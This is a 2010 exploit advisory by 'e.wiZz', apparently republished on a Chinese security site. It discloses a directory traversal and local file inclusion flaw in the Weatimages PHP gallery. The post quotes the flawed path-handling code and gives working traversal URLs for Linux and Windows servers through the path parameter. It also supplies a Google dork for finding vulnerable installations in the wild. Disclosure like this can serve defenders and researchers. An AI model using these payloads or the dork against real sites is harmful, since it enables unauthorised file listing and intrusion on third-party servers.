Weatimages Directory Traversal and LFI Vulnerabilities

		当前位置：主页>安全文章>文章资料>Exploits>文章内容

Weatimages Directory Traversal and LFI Vulnerabilities

来源：vfocus.net 作者： e.wiZz 发布时间：2010-01-04

Weatimages Directory Traversal&Local File Include Vulnerabilities

By: e.wiZz!


############Script info:

############Site: http://nazarkin.name/projects/weatimages/download.php



In the wild...

#######################################################


#######index.php:

...

//kill oneself if user trying to access resource with '/../' in path
if (strstr(urldecode($_SERVER['REQUEST_URI']), '/../')) { fatal_error('Suspicious query rejected'); }

...

if (!$REQUEST_PATH) {
	if ($_GET['path']) { //compatibility mode enabled and we have some path
		$REQUEST_PATH = $_GET['path'];
		$SERVER_PHP_SELF = $_SERVER['SCRIPT_NAME'] . '/' . $REQUEST_PATH . '/';
	}
	else { //we are in the root directory
		$REQUEST_PATH = '.';
	}
}

...

...huh, did you know there are Windows servers?

#####List files in directory you want(linux):

http://inthewild/index.php?path=../
http://inthewild/index.php?path=../..

##### Windows?:

http://inthewild/index.php?path=..\anything


########Dork:
http://www.google.ba/#hl=bs&q=%22Powered+by+Weatimages%22&start=20&sa=N&fp=73afe0b6734a45d2  (google says 200 000,i dont trust them)

[

推荐] [

评论(0条)] [返回顶部] [打印本页] [关闭窗口]

匿名评论

评论内容：(不能超过250字，需审核后才会公布，请自觉遵守互联网相关政策法规。

§最新评论：

热点文章

·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·VideoScript 3.0 <= 4.0.1.50 Of
·Yahoo! Messenger Webcam 8.1 Ac
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1

推荐广告